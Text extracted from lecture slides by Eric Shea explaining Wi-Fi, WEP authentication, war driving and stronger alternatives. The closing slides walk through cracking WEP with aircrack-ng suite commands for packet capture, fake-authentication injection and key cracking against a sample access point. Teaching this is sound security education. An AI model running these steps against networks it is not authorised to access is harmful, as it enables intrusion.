Wireless Encryption: Wireless Encryption: WEP and cracking it.WEP and cracking it.

Eric Shea

Background on Wi-FiBackground on Wi-Fi802.11over-the-air protocol

802.11a/b/g/n:SpeedsFrequenciesRange

◦Physical Obstructions ◦Example: Cordless Phone

Wireless Security MythsWireless Security MythsMAC address limitingHidden SSIDUsing WEPDisable DHCP

Wireless Frames/PacketsWireless Frames/PacketsFraming:

◦Management - clear Authentication - encrypted

◦Control◦Data - encrypted

Error detection

Collecting FramesCollecting FramesImportant Part:

◦Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know.

◦Included in every authorization frame.

◦In some data frames.

Wired Equivalent Privacy Wired Equivalent Privacy (WEP)(WEP)1997, deprecatedIntended to protect dataPrevent unauthorized access to

the networkHexadecimal 64/128/256 bit keys

Authentication Authentication The client station sends an

authentication request to the Access Point.

The Access Point sends back a clear-text challenge.

The client has to encrypt the challenge text using the configured WEP key, and send it back in another authentication request.

The Access Point decrypts the material, and compares it with the clear-text it had sent. Depending on the success of this comparison, the Access Point sends back a positive or negative response.

War Chalking / War War Chalking / War DrivingDriving

War Chalking - practice of marking sidewalks and walls with special symbols to indicate that wireless access.

War Driving - driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks.

Alternative SecurityAlternative SecurityWPA/WPA2

◦random10 digit or longer key◦(1000) Single core computer 500

years to crackVPN

◦Required authentication◦Username/password

Cracking WEPCracking WEPTools = Aircrack-ng Suite / KismetKismet

◦Discover wireless networksAirodump-ng

◦Capturing packetsAircrack-ng

◦Brute force crack methodAireplay

◦Packet injection

Kismet DemoKismet Demo

Capture packetsCapture packets airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output

ath0

-c 9 is the channel for the wireless network --bssid 00:14:6C:7E:40:80 is the access point MAC

address. This eliminate extraneous traffic. -w capture is file name prefix for the file which will

contain the IVs. ath0 is the interface name.

Packet InjectionPacket Injection aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h

00:0F:B5:88:AC:82 ath0

-1 means fake authentication 0 reassociation timing in seconds -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:0F:B5:88:AC:82 is our card MAC address ath0 is the wireless interface name

Cracking the captured Cracking the captured packetspacketsaircrack-ng -b 00:14:6C:7E:40:80

output*.cap

-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.

output*.cap selects all files starting with “output” and ending in ”.cap”.

Demo Aircrack-ng SuiteDemo Aircrack-ng Suite

Aircrack-ng SuiteAircrack-ng Suitewww.aircrack-ng.orgSimple wep cracking tutorial

◦http://www.aircrack-ng.org/doku.php?id=simple_wep_crack